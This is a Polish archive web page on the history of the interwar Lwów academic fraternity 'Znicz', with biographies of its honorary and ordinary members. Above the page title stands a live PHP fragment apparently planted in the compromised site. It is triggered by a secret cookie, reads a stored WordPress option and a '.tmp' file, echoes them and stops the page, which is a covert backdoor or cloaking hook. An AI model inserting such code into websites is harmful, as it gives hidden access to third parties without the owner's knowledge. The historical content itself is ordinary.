if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Znicz

Dekiel Znicza - vide Poszukiwania. Nazwa:
Polska Korporacja Akademicka “Znicz” we Lwowie
Siedziba:
Lwów
Data powstania:
29 XI 1923 r.
Barwy:
zielona – złota – malinowa
Dewiza:
„Razem młodzi przyjaciele”

Rys historyczny

Bandy Oktawiana Zubka.

Znicz została założona dnia 29 XI 1923 r. przez 16 studentów uczelni lwowskich, absolwentów X Gimnazjum “Bernardyńskiego” we Lwowie. Założyciele korporacji tworzyli w czasach gimnazjalnych Klub Towarzyski “Pelikan”, którego celem była wzajemna pomoc i współwychowywanie, a po rozpoczęciu studiów postanowili stworzyć własną korporację na wzór działających już we Lwowie Lutyko-Venedyi i Leopolii.

Herb Znicza, 1931 r.

Od dnia 1 V 1924 r. korporacja należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 1 V 1924 r.). Kandydowała pod opieką K! Lutyko-Venedya.

Znicz należała do najprężniejszych korporacji lwowskich. Z inicjatywy Znicza podjęto i zrealizowano w latach 1935-39 projekt budowy przez korporantów polskiego kościoła w Mikłaszowie. Henryk Goering był w latach 1935-37 wiceprezesem Związku Polskich Korporacji Akademickich, a Roman Haiman i Zdzisław Kuciński prezesami Lwowskiego Koła Międzykorporacyjnego.

Znicz, lata 20-te.

Przy K! Znicz kandydowała K! Roxolania.

Korporacja zawarła dnia 30 I 1926 r. kartel wieczysty z K! Leopolia.

Siedziby korporacji mieściły się: w latach 1928-33(?) czteropokojowa na parterze przy ul. Kaleczej 20a, a następnie w latach 1933(?)-39 mniejsza dwupokojowa przy ul. Mochnackiego 34.

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 91 nazwisk, w tym dziewięciu członków honorowych.

Wyjazd Znicza na Akademickie Ślubowania Jasnogórskie, Lwów 23 V 1936 r.

Brak wiadomości dotyczących powojennej działalności Korporacji i spotkań jej członków.

Lista członków

Poniższa, niekompletna lista członków Znicza obejmuje ponad 90 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Kazimierz Ciesielski, prof. Wydziału Medycyny UJK, Filister honorowy Znicza

  Karol Czerny, 1908 r.

 2. Karol Czerny, (17 września 1863 we Lwowie – 31 października 1947 w Gliwicach) ojciec Stanisława (Znicz), mgr praw, adwokat, od 1908 do 1939 ostatni właściciel maj. Wielkie Oczy, Filister honorowy Znicza

 3. Aleksander Doliński, (1866 - 23 grudnia 1930 we Lwowie) s. Aleksandra, absolwent prawa ULw., następnie studiował także w Berlinie i Getyndze, habilitacja ULw. 1895, od 1904 prof. nadzw., od 1909 prof. zw., dziekan UJK, rektor Wyższej Szkoły Handlu Zagranicznego 1930, kierownik sekcji prawa handlowego Komisji Kodyfikacyjnej RP 1919-30, autor projektów ustów o prawie wekslowym i czekowym, spółce akcyjnej oraz spółce z ograniczoną odpowiedzialnością, Filister honorowy Znicza

  Stanisław Głąbiński, 1925 r.

 4. Stanisław Głąbiński, (25 lutego 1862 w Skolem - 14 sierpnia 1941 w Charkowie) absolwent Gimnazjum w Samborze i prawa na Uniwersytecie we Lwowie, dr praw 1887, wykładowca Uniwersytetu we Lwowie, zajmował się ekonomią i skarbowością, habilitacja 1888, prof. nadzw. 1893, prof. zw. 1895, dziekan Wydziału Prawa 1889-90, rektor 1908-09, od 1890 działacz Narodowej Demokracji, poseł do austriackiej Rady Państwa 1902-18, m.in. prezes Koła Polskiego, a od 1910 prezydent połączonych izb poselskich austriackiej i węgierskiej, minister kolei w gabinecie premiera Reinharda Bienertha, czołowy działacz endecji w dwudziestoleciu międzywojennym, poseł na Sejm, prezes Rady Naczelnej Związku Ludowo-Narodowego oraz przewodniczący klubu poselskiego Związku, w latach 1928-35 senator RP i przewodniczący klubu Stronnictwa Narodowego w Senacie, Filister honorowy Grunwaldji, Znicza i Avanguardii, aresztowany w listopadzie 1939 przy przekraczaniu granicy polsko-rumuńskiej przez NKWD, skazany na 8 lat więzienia za próbę przekroczenia granicy, zmarł w sowieckim więzieniu

 5. Stanisław Grabski, (5 kwietnia 1871 w Borowie nad Bzurą - 6 maja 1949 w Sulejówku) z rodziny ziemiańskiej, prof. ekonomii ULw./UJK, Akademii Rolniczej w Dublanach, UJ, o od 1947 UW, w młodości działacz socjalistyczny, od 1902 związany z obozem narodowym, od 1906 członek władz Ligi Narodowej, od 1907 wiceprezes Stronnictwa Narodowo-Demokratycznego w Galicji, członek Komitetu Narodowego Polskiego w Paryżu, członek delegacji negocjującej traktat ryski 1921, poseł na Sejm z listy Związku Ludowo-Narodowego 1919-27, minister wyznań religijnych i oświecenia publicznego 1923 oraz 1925-26, po przewrocie majowym w 1926 wycofał się z życia politycznego i poświęcił się pracy naukowej i publicystycznej, Filister honorowy Znicza, Cresovii Leopoliensis, Avanguardii, po zajęciu Lwowa przez Rosjan w 1939 aresztowany przez NKWD i uwięziony 1939-41, po układzie Sikorski-Majski uwolniony, wyjechał do Londynu, przewodniczący II Rady Narodowej RP 1942-44, w 1945 wraz ze Stanisławem Mikołajczykiem wrócił do Polski, jeden z wiceprezesów Krajowej Rady Narodowej 1945-47, od stycznia 1947 kierownik katedry ustrojów społecznych na Wydziale Prawa UW, pochowany na Cmentarzu Powązkowskim w Warszawie
 6. Włodzimierz Mańkowski, inż., Filister honorowy Znicza
 7. Leonard Stahl, (18 października 1866 - 2 grudnia 1929) ojciec Zdzisława (Leopolia), prawnik, adwokat, polityk związany z narodową demokracją, obrońca Lwowa, uczestnik wojny polsko-bolszewickiej 1920, członek Rady Naczelnej Związku Ludowo-Narodowego, członek Prezydium Rady Dzielnicowej Stronnictwa Narodowego, wiceprezydent Lwowa, Filister honorowy Leopolii i Znicza, pochowany prawdopodobnie na Cmentarzu Obrońców Lwowa
 8. Stanisław Prus-Szczepanowski, s. Stanisława, ojciec Jana i Jerzego (obaj Znicz), inż., przedsiębiorca naftowy, Filister honorowy Znicza

  Oktawian Zubek, ok. 1913 r.

 9. Oktawian Zubek, (14 września 1892 w Mielnicy w woj. tarnopolskim - 21 listopada 1970 we Wrocławiu) s. Józefa i Oktawii z Morawskich, student prawa Uniwersytetu w Wiedniu 1911-14 i ULw. 1918-19 (?), dr praw, w armii austriackiej 1914-16, ciężko ranny dostał się niewoli włoskiej 1916-17, po studiach pracownik, w tym m.in. naczelnik Wydziału Prawno-Hipotecznego Banku Towarzystwa Kredytowego Ziemskiego we Lwowie, Filister honorowy Znicza, po ekspatriacji m.in. wicedyrektor d/s administracji Zakładów w Walimiu k. Wałbrzycha, od 1956 na emeryturze

Członkowie rzeczywiści

 1. Franciszek Babiński, c. 1938
 2. Zbigniew Bidziński, sekretarz 1929
 3. Jarosław Bilikowski, ( - 20 września 1995 Bedford w Wielkiej Brytanii) z Kut, fuksmajor 1938/39, ciężko ranny pod Caen przy lądowaniu I Dywizji Pancernej, po wojnie na emigracji w Wielkiej Brytanii
 4. Leszek Bobrowski, po wojnie na emigracji w Kanadzie, zamiejscowy członek
  Koła Filistrów Polskich Korporacji Akademickich w Montrealu [prawd. tożsamy z Leszek Bobowski, wiceprezes Bratniej Pomocy Studentów UJK 1933 i 1933/34, wiceprezes Czytelni Akademickiej 1935, działacz Młodzieży Wszechpolskiej i Stronnictwa Narodowego]

 5. Wiktor Budzyński, (4 marca 1906 w Stanisławowie - 30 kwietnia 1972 w Londynie) akt. 1924-29, autor słów hymnu Znicza, twórca Lwowskiej Wesołej Fali, podczas wojny ten zespół działał na frontach jako czołówka PSZ, po wojnie na emigracji w Wielkiej Brytanii, polonijny działacz kulturalny, pisał, organizował i wystawiał utwory sceniczne i przedstawienia artystyczne, stworzył teatr “Niebieski Balonik” (później “Różowy Balonik”)
 6. Jarosław Bułat, (28 lutego 1904 we Lwowie - 28 stycznia 1999 w Katowicach) s. Jana (urzędnika kancelaryjnego Magistratu Lwowskiego) i Marii z d. Majer, brat Juliana (Slavia), w czasie wojny polsko-ukraińskiej uczestniczył w obronie Lwowa, w 1918 czynny członek POW ps. “Sowa” we Lwowie, od 1914 uczeń w XIII Gimnazjum Realnym we Lwowie, skąd w VII klasie klasie uczniowie zostani przeniesieni do Państwowego Gimnazjum X im. H. Sienkiewicza (”Bernardyńskiego” )we Lwowie, student prawa UJK oraz równolegle Wydziału Handlu Zagranicznego UW, założyciel Znicza, akt. 192?-26, dr praw, mgr ekonomii, w 1940 był w Szkole Podoficerskiej w Chateau de Champeau we Francji, następnie służył w Szkocji w stopniu podporucznika artylerii, w czasie wojny pracował także w sztabie polskiego lotnictwa w Szkocji, gdzie uczył pilotów języka angielskiego, odznaczony Krzyżem Kawalerskim OOP 1966, Medalem Niepodległości 1933, Krzyżem za udział w Wojnie 1918–1921 1990, Medalem Obrony; Medalem Wojny 1939-1945, pochowany na cmentarzu ewangelickim przy ul. Francuskiej w Katowicach [Źródła (poza wskazanymi poniżej spisu członków): relacja wnuczki Agnieszki Durczok-Sanetra]
 7. Edward Chechliński, (11 października 1903 we Lwowie - 1964) student i absolwent mechaniki PL, założyciel Znicza, sekretarz sem. let. 1924/25, wiceprezes 1926, starszy asystent PL 1932-35, kierownik w FZA Chorzów 1935-39, kierownik w Mościcach 1939-48, kierownik Biura Projektowego w Krakowie 1948-63
 8. Tadeusz Chlipalski, (1 lutego 1904 - 6 lutego 1997 w Krakowie) student i absolwent mechaniki PL, założyciel, inż. mechanik, prof. Politechniki Śląskiej
 9. Chmaj, student prawa UJK, akt. 1924-28
 10. Józef Cieński,
 11. Kazimierz Ciesielski, wiceprezes sem. zim. 1929/30
 12. Stanisław Czerny, s. Karola, student i absolwent agronomi PL (Dublany), w czasie II wojny światowej w 10 pułku dragonów PSZ, po wojnie na emigracji
 13. Daszkiewicz, akt. ok. 1928
 14. Długosz, akt. ok. 1928
 15. Julian Dżugan, olderman sem. let. 1927/28, prezes 1929, wiceprezes Czytelni Akademickiej 1928
 16. Stanisław Fiałkiewicz, skarbnik 1937/38
 17. Mieczysław Filozof, akt. 1925-30, mgr prawa, urzędnik Banku Polskiego, zwolniony za przekonania antysanacyjne, członek Związku Hallerczyków
 18. Furdzik, sekretarz sem. let. 1926/27
 19. Henryk Goering, student i absolwent Akademii Handlu Zagranicznego, akt. 1931-39, prezes 1934, wiceprezes ZPKA 1935-37 (XIV kadencja)
 20. Roman Haiman, prezes sem. let. 1926/27 oraz sem. let. 1927/28, olderman 1928, Przewodniczący VIII Zjazdu ZPKA we Lwowie, odznaczony Dyplomem Zasługi i Złotą Odznaką ZPKA, prezes Czytelni Akademickiej 1928, mgr prawa
 21. Tadeusz ? Mieczysław Hasko, ( - 1963 w Austrii) inż. mechanik, w czasie II wojny światowej w PSZ na Zachodzie, po wojnie na emigracji w Wielkiej Brytanii
 22. Mieczysław Jan Lubin de Ines, (1911 w Nowym Sączu - ) student i absolwent mechaniki PL, c. 1930, akt. 1930-33, prezes 1932, wiceprezes sem. let. 1932/33 (od grudnia), dr inż. mechanik 1936, adiunkt PL 1937-39, po wojnie w szkolnictwie technicznym w Bielsku
 23. Zygmunt Juściński, student i absolwent chemii PL, c. 1931, starszy asystent PL
 24. Julian Kaczorowski, student mechaniki (oddział naftowy) PL, założyciel Znicza, inż. mechanik wiertnictwa naftowego
 25. Zbigniew Klimkiewicz, “Bibi”, wiceprezes sem. let. 1927/28 i 1929

  Tadeusz Köhler, 1928 r.

 26. Tadeusz Köhler (Koehler), (26 marca 1904 we Lwowie - 2 września 1993 we Wrocławiu) student i absolwent 1929 Oddziału Lasowego Wydziału Rolniczo-Leśnego PL, założyciel Znicza, akt. 1923-29, olderman 1929, wiceprezes 1926 i prezes 1927 Czytelni Akademickiej, po wojnie m.in. zastępca kierownika Wydziału Rolnictwa Urzędu Wojewódzkiego we Wrocławiu, od 1971 na emeryturze

 27. Janusz Kolmer, brat Jerzego Andrzeja (Znicz), student prawa UJK i Wyższej Szkoły Handlu Zagranicznego, założyciel Znicza, akt. 1923-28, prezes sem. let. 1924/25, olderman sem. zim. 1927/28, po wojnie na emigracji w Wielkiej Brytanii
 28. Jerzy Andrzej Kolmer, ( - ok. 1942 w Persji) brat Janusza, student i absolwent prawa UJK, po studiach adwokat we Lwowie, deportowany w głąb ZSRR, zmarł na tyfus po przejściu granicy perskiej, pochowany na polskim cmentarzu w Teheranie
 29. Zbigniew Konikowski, (17 maja 1912 w Tarnopolu - 13 listopada 1999) student i absolwent prawa UJK oraz Akadmii Handlowej we Lwowie, akt. 1932-37, prezes 1933, referent prasowy ZPKA 1936/37, po studiach pracował w Ministerstwie Komunikacji oraz Polskich Kolejach Państwowych, w 1940 deportowany w głąb ZSRR, następnie artylerzysta w II Korpusie PSZ, kpt WP, po wojnie na emigracji w Wielkiej Brytanii, a od 1952 w Stanach Zjednoczonych, działacz polonijny, członek Rady Dyrektorów spółki wydawniczej “Nowego Dziennika”, wieloletni adiutant generalny Stowarzyszenia Weteranów Armii Polskiej w Ameryce, członek Polskiego Instytutu Naukowego w Nowym Jorku, odznaczony Krzyżem Walecznych oraz Krzyżem Monte Cassino
 30. Emil Korczyński, zwolniony z Korporacji 12 maja 1926
 31. Broniław Kozień, akt. 1931-36, sekretarz sem. let. 1932/33 (od grudnia) i 1933, wiceprezes 1934, prezes 1935, mgr praw
 32. Marian Krzyształowicz (Kryształowicz), akt. 1925-30, olderman sem. zim. 1929/30
 33. Roman Krzyżanowski, ( - 1939)
 34. Zdzisław Kuciński, ( - 1941 w Kazachstanie) student i absolwent prawa UJK, akt. 1925-32, prezes sem. zim. 1929/30, olderman 1931, wiceprezes 1929/30 oraz prezes 1930/31 Lwowskiego Koła Międzykorporacyjnego, bankowiec, deportowany do Kazachstanu wiosną 1940, gdzie zmarł na tyfus 1941
 35. Włodzimierz Kulawik, student Wyższej Szkoły Handlu Zagranicznego, założyciel Znicza, akt. 1923-28, olderman sem. let. 1926/27
 36. Zdzisław Kulawik, założyciel Znicza, akt. 1923-28, inż. chemii
 37. Stanisław Leśnikowski, (1912 we Lwowie - 2001) student prawa UJK, c. 1930/31 w Korporacji Znicz, c. 1933 w Korporacji Slavia, olderman, prezes, olderman mgr praw UJK 1938, radca prawny w Gliwicach
 38. Roman Lewicki, (25 maja 1912 w Kosowie - ) absolwent Gimnazjum im. Kazimierza Jagiellończyka w Kołomyi, do 1936 student prawa UJK, c. 1931, od 1936 zarządca, a po śmierci wujostwa właściciel maj. Pererów oraz Zahajpol, po wkroczeniu sowietów skazany na karę śmierci przez rozstrzelanie, która została zmieniona na 25 lat ciężkich robót, wywieziony do łagrów przy budowie kolei Kotlas-Workuta, w 1941 zwolniony i przyjęty do II Korpusu, od 1943 jako ochotnik w Oddziale Specjalnym Naczelnego Wodza, a od 1944 znowu w II Korpusie, po wojnie kontynuuje student i absolwent z tytułem dr praw Uniwersytetu w Rzymie, pozostał na emigracji w Wielkiej Brytanii, pracownik, a w końcu dyrektor departamentu “Design and Tchnology” Szkoły St. Thomas More w Londynie, a następnie pracownik Szkoły Cardinal Manning w Londynie, aktywny działacz polityczno-społeczny emigracji, m.in. sekretarz Koła Cichociemnych Spadochroniarzy AK, członek Rady Narodowej, Rady Instytutu Piłsudskiego, Rady Polskiej YMCA, Koła Lwowian, Ligi Niepodległości Polski, od 1980 generalny sekretarz, a od 1981 podsekretarz stanu w Ministerstwie Spraw Krajowych (rządy Kazimierza Sabbata oraz Edwarda Szczepanika), towarzyszył Prezydentowi Ryszardowi Kaczorowskiemu przy wręczeniu insygniów państwowych Prezydentowi Lechowi Wałęsie 1990, autor “Wspomnień ze studiów na Uniwersytecie Jana Kazimierza we Lwowie w latach 1930-38″ (Biuletyn Zarządu SFPKA, nr 11, Warszawa 1996, s. 114 i n.), odznaczony Krzyżem Walecznych, Srebrnym Krzyżem Zasługi z Mieczami, Złotym Krzyżem Zasługi, Krzyżem Kawalerskim i Oficerskim OOP
 39. Antoni Leyczak, akt. 1925-30, inż. budownictwa wodnego

  Stanisław Łucki, ok. 1938 r.

 40. Stanisław Łucki, (3 maja 1917 w Kutach - 28 stycznia 2013 w Paryżu) s. Stefana i Katarzyny z Pogonowskich, student prawa UJK 1935-39, akt. 1935-39, prezes 1939, członek Stronnictwa Narodowego we Lwowie w październiku 1939 nielegalnie przekroczył granicę z Rumunią, przez Jugosławię i Grecję przedostał się do Coëtquidan we Francji, gdzie dołączył do PSZ na Zachodzie, żołnierz Brygady Podhalańskiej, uczestnik ekspedycji do Norwegii i bitwy o Narwik, pracownik Wydziału Informacyjno-Wywiadowczego Sztabu Naczelnego Wodza (sieć F2) w okręgu Lyonu i Paryżu 1942-44, ppor. WP, kpt. honorowy Armii Francuskiej, od 1945 pracownik delegatury MSW we Francji jako attaché konsularny w Paryżu, student prawa Uniwersytetu w Oxfordzie 1945, po wojnie działacz polityczno-społeczny emigracji polskiej we Francji, członek Stronnictwa Narodowego, wydawca dwutygodnika “Placówka” 1945-50, współredaktor miesięcznika Stronnictwa Narodowego we Francji “Biuletyn Narodowy” 1954-59, dyrektor administracyjny Campagnie Minière de’Agidir w Maroku 1955-56, szef grupy zakupów, a następnie odpowiedzialny za eksport do Afryki w Sociétè des Automobiles Panhard et Levassor w Paryżu 1956-63, szef serwisu wewnętrznego w Exploitations Electriques et Industrielles w Paryżu 1963-72, szef działu prawnego Regie Autonome des Transports Parisiens w Paryżu 1973-82, od 1982 na emeryturze, członek i działacz licznych stowarzyszeń i organizacji, m.in. członek założycielski Fundacji Narodowej im. Romana Dmowskiego, Koła Lwowian, Stowarzyszenia Polskich Kombatantów, Komitetu Wykonawczego Zjednoczenia Polskiego Uchodźstwa Wojennego, Rady Skarbu Narodowego, przez 20 lat skarbnik Towarzystwa Historyczno-Literackiego w Paryżu, Komitetu Lokalnego Biblioteki Polskiej w Paryżu, Polskiego Funduszu Humanitarnego, prezes a od 1993 honorowy prezes Towarzystwa Opieki nad Polskimi Zabytkami i Grobami Historycznymi we Francji, Amicale du “Réseau F2″, po odrodzeniu ruchu korporacyjnego w Polsce po 1989 r., należał do Stowarzyszenia Filistrów Polskich Korporacji Akademickich w Warszawie oraz Stowarzyszenia Filistrów Korporacji Akademickich w Poznaniu, wspierał działalność Archiwum i Muzeum Polskich Korporacji Akademickich w Poznaniu, w 2007 w ramach akcji Ostatni Filistrzy zarejestrowano z Nim wywiad wspomnieniowy, odznaczony m.in. Krzyżem Walecznych, Medalem Armii Polskiej, Krzyżem Komandorskim z Gwiazdą OOP, Legią Honorową, Komandorią l’Ordre National du Mérite, Krzyżem Combattant Volontaire, Krzyżem Wojennym z Palmami, Medalem Ruchu Oporu, norweskim Medalem za Bitwę pod Narwikiem, pochowany na cmentarzu Les Champeaux w Montmorency

 41. Adam Mazurkiewicz, akt. 1927-31
 42. Tadeusz Miarka, (1911 - ) akt. 1931-39, mgr praw, w 1939 przez zieloną granicę przedostał się do Francji, w Polskich Siłach Zbrojnych, po wojnie na emigracji we Francji
 43. Mieczysław Moczarski, (1911 - grudzień 1939 we Lwowie) student i absolwent 1937 mechaniki PL, olderman 1938, po wybuchu wojny w tajnej organizacji narodowej “Wyzwolenie”, aresztowany przez NKWD i zamordowany w więzieniu przy ul. Kazimierzowskiej we Lwowie
 44. Stanisław Mossoczy,
 45. Nycz,
 46. Zbigniew Olinkiewicz, wiceprezes 1937, inż. lądowy, przez zieloną granicę przedostał się do Francji, w Polskich Siłach Zbrojnych, po wojnie na emigracji w Wielkiej Brytanii
 47. Zbigniew Olszewski, akt. 1926-30, sekretarz sem. zim. 1927/28 i 1928
 48. Władysław Pańczak wiceprezes Czytelni Akademickiej 1929, działacz Zrzeszenia Akademickich Kół Prowincjonalnych, prezes Koła Polonistów UJK 1930, red. “Spraw Akademickich” w “Kurierze Lwowskim”
 49. Roman Pichut (Pihut), młodszy brat Włodzimierza (Znicz), żołnierz w II Korpusie PSZ
 50. Włodzimierz Pichut (Pihut), ( - 1939/40) starszy brat Romana (Znicz), akt. 1931-36, mgr praw

  Józef Romaszkiewicz, 1932 r.

 51. Józef Romaszkiewicz, (1905 - 1979 we Wrocławiu) do 1939 obywatel Litwy Kowieńskiej, akt. 1931-38, wiceprezes 1935, prezes 1936, inż. architekt

 52. Zenon Rosnowski, student mechaniki PL, założyciel Znicz, akt. 1924-30, wiceprezes Bratniej Pomocy Studentów PL 1924/25, inż. mechanik
 53. Adam Rudnicki, akt. 1926-30
 54. Gustaw Rückemann, absolwent X Gimnazjum “Bernardyńskiego” we Lwowie, student prawa UJK, założyciel Znicz, akt. 1924-26, skreślony 12 maja 1926
 55. Mieczysław Rydzewski, akt. ok. 1927
 56. Wincenty Samolewicz, ? ( - 22 października 1942) mgr praw UJK, radca NIK we Lwowie, aresztowany przez Gestapo, zesłany do Auschwitz, zmarł z wycieńczenia
 57. Adam Samulewicz, bliźniaczy brat Stefana (Znicz), akt. 1930-35, mgr praw, urzędnik Banku Gospodarczego w Kołomyi
 58. Stefan Samulewicz, ( - zm. w Londynie) bliźniaczy brat Adama (Znicz), absolwent Akademii Handlu Zagranicznego, akt. 1930-35, mgr praw, po wojnie na emigracji w Wielkiej Brytanii

  Mieczysław Setkowicz, ok. 1938 r.

 59. Mieczysław Setkowicz, student mechaniki (oddział naftowy) PL, założyciel Znicza, akt. 1924-38, skarbnik sem. zim. 1929/30, prezes sem. let. 1932/33 (od grudnia) i 1933, olderman 1937, sekretarz Lwowskiego Koła Międzykorporacyjnego 1930/31, inż. mechanik naftowy, po wojnie na emigracji w Wielkiej Brytanii

 60. Emil Skorubski, student prawa UJK, założyciel Znicza, mgr praw
 61. Michał Słoniowski, sekretarz sem. let. 1927/28
 62. Emil (Kuba) Słoniowski, założyciel Znicza, mgr praw
 63. Stanisław Socha, ( - 15 września 2002 w Krośnie) student i absolwent prawa UJK, akt. 1933-39, w czasie II wojny światowej w konspiracji w ZWZ-AK, więzień obozów koncentracyjnych w Auschwitz 1940-44 i Mauthausen 1944-45, w 1946 wrócił do Polski, pracownik NBP w Będzinie i Sosnowcu, dyrektor oddziału NBP w Krośnie 1952-80
 64. Józef Stanek, ze Żmigroda pod Jasłem, akt. 1932-38, prezes 1937, wiceprezes 1936, zaginął w nieznanych okolicznościach
 65. Jerzy Supiński, student prawa UJK, wiceprezes sem. let. 1926/27
 66. Jan Prus-Szczepanowski, ( - 1937) s. Stanisława, starszy brat Jerzego (obaj Znicz), student Wydziału Mechanicznego PL, akt. 1928-36, wielokrotny prezes i olderman, skarbnik Lwowskiego Koła Międzykorporacyjnego 1930/31, zginął w katastrofie szybowcowej
 67. Jerzy Prus-Szczepanowski, (21 listopada 1909 w Borysławiu-Tustanowicach - 26 kwietnia 1945 w Niemczech) s. Stanisława, młodszy brat Jana (obaj Znicz), student i absolwent prawa UJK, akt. 1928-39, prezes sem. zim. 1931/32, sekretarz, wiceprezes, prezes, olderman, kodyfikator ZPKA, odznaczony Dyplomem Zasługi i Złotą Odznaką ZPKA, aplikant adwokacki, ppor. broni panc., żołnierz PSZ na Zachodzie, zginął zastrzelony po wychyleniu z wieżyczki czołgu, pochowany na cmentarzu katolickim Bargeroosterveld w Holandii

  Antoni Józef Szczygieł, ok. 1938 r.

 68. Antoni Józef Szczygieł, ( - 1992 w Warszawie) akt. 1932-38, prezes 1938, mgr praw, adwokat

 69. Józef Szwarc (Schwarz), akt. 1924-32
 70. Tapkowski, początkowo (?) w Korporacji Znicz, przeszedł (?) do Leopolii
 71. Włodzimierz Tomek, (1912 - 4 lipca 1995 w Krakowie) akt. 1932-39, inż. leśnik, dr nauk przyrodniczych, założyciel muzeum przyrodniczego w Ciężkowicach pod Tarnowem
 72. Mieczysław Trusz, (20 czerwca 1908 - 13 listopada 1991 w Stanach Zjednoczonych) absolwent V Gimnazjum we Lwowie, student i absolwent prawa UJK, akt. 1931-32, sekretarz sem. zim. 1931/32, dr praw UJK, po studiach pracownik Izby Skarbowej we Lwowie, w czasie II wojny światowej w PSZ w Anglii, po wojnie na emigracji w Stanach Zjednoczonych, wiceprezes Instytutu im. R. Dmowskiego, pochowany w kwaterze Weteranów Cmentarza w Doylestown
 73. Aleksander Wajdowicz, (1906 - 29 listopada 1930) akt. 1925-30, prezes sem. zim. 1927/28, wiceprezes, mgr praw UJK i absolwent Wyższej Szkoły Handlu Zagranicznego, pochowany na Cmentarzu Janowskim we Lwowie
 74. Jan Pawel Wajs, (1910 - 12 czerwca 1977 w Warszawie) student i absolwent PL, akt. 1933-39, sekretarz 1937, prezes 1939, asystent PL 1939/40, po wojnie dyrektor techniczny cukierni i szef budowlany cukrowni w Iranie i Grecji
 75. Józef Wanke, akt. 1930/36, lekarz med., po wojnie na emigracji
 76. Adam Wiciński, (1906 - 1937 we Lwowie) akt. 1925-29, dyplom 1929, dr inż. mechanik, starszy asystent PL 1929-37, wynalazca bezkorbowej sprężarki WIBU
 77. Józef Ksawery Wierzbicki, (1904 we Lwowie - 22 lutego 1942(41?) we Lwowie) student Wydziału Filozoficznego UJK, założyciel Znicza, akt. 1924-27, wiceprezes sem. let. 1924/25, mgr praw i absolwent WSHZ, bankowiec, wiceprezes Związku Bankowców, Filister honorowy Lutyko-Venedyi
 78. Klemens Wierzchleyski, (?) (1902 - ) student i absolwent 1930 mechaniki PL, początkowo być może (?) w Zniczu, później w Scythii, akt. 1927-28, asystent PL, potem mechanik Stacji Doświadczalnej w Hajdukach Wielkich, sekretarz Związku Filistrów Scythii 1933
 79. Konrad Zajączkowski, (1904 - 12 lutego 1987 w Krakowie) student i absolwent 1933 mechaniki PL, absolwentów X Gimnazjum “Bernardyńskiego” we Lwowie, założyciel Znicza, akt. 1924-30, olderman sem. let. 1924/25, asystent PL 1930-34, aresztowany w 1939 przez NKWD i deportowany do łagrów, w Polskich Siłach Zbrojnych w II Korpusie, por., po wojnie starszy wykładowca prof. (?) AGH, odznaczony m.in. Krzyżem Walecznych i Krzyżem Monte Cassino
 80. K. Zarawski, sekretarz 1930

  Piotr Zieliński, ok. 1938 r.

 81. Piotr Zieliński, ( - 24 marca 1976) z Kut, akt. 1932-37, mgr praw, po wojnie dyrektor Monopolu Tytoniowego w Malborku

 82. Tadeusz Zieliński, syn właściciela kawiarni Szkockiej we Lwowie (?), student prawa UJK, akt. 1928-30, sekretarz sem. zim. 1929/30

Pieczęć Znicza, 1931 r.

Listę członków opracowano na podstawie:

1) Zbysław Popławski, Lista członków Polskiej Korporacji Akademickiej Znicz (Lwów), (w:) Polskie Korporacje Akademickie 1996, nr 11, s. 58 i n.,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Znicz.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 17 IX 2010 r.
Ostatnia zmiana 12 III 2022 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Korporacja Akademicka “Znicz” we Lwowie, (na:) www.archiwumkorporacyjne.pl, stan 12 III 2022 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }